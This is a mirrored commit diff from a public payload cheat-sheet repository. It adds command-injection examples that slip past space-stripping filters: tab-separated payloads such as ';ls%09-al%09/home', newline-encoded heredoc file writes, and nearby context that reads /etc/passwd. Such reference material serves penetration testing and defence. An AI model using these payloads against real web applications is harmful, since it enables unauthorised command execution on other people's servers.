mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 06:42:47 +00:00
Command Injection space alternatives
This commit is contained in:
parent
f23412d67a
commit
171a6f2b21
1 changed files with 18 additions and 0 deletions
|
@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
|
||||||
IFS=,;`cat<<<uname,-a`
|
IFS=,;`cat<<<uname,-a`
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Tabs work as separators in web apps where spaces are removed.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
;ls%09-al%09/home
|
||||||
|
drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
|
||||||
|
drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
|
||||||
|
drwx------ 2 root root 16384 Jan 10 13:31 lost+found
|
||||||
|
drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
|
||||||
|
```
|
||||||
|
|
||||||
Works on Windows only.
|
Works on Windows only.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -109,6 +119,14 @@ ping%PROGRAMFILES:~10,-5%IP
|
||||||
something%0Acat%20/etc/passwd
|
something%0Acat%20/etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
|
You can also write files.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
;cat>/tmp/hi<<EOF%0ahello%0aEOF
|
||||||
|
;cat</tmp/hi
|
||||||
|
hello
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass characters filter via hex encoding
|
### Bypass characters filter via hex encoding
|
||||||
|
|
||||||
Linux
|
Linux
|
||||||
|
|
Loading…
Reference in a new issue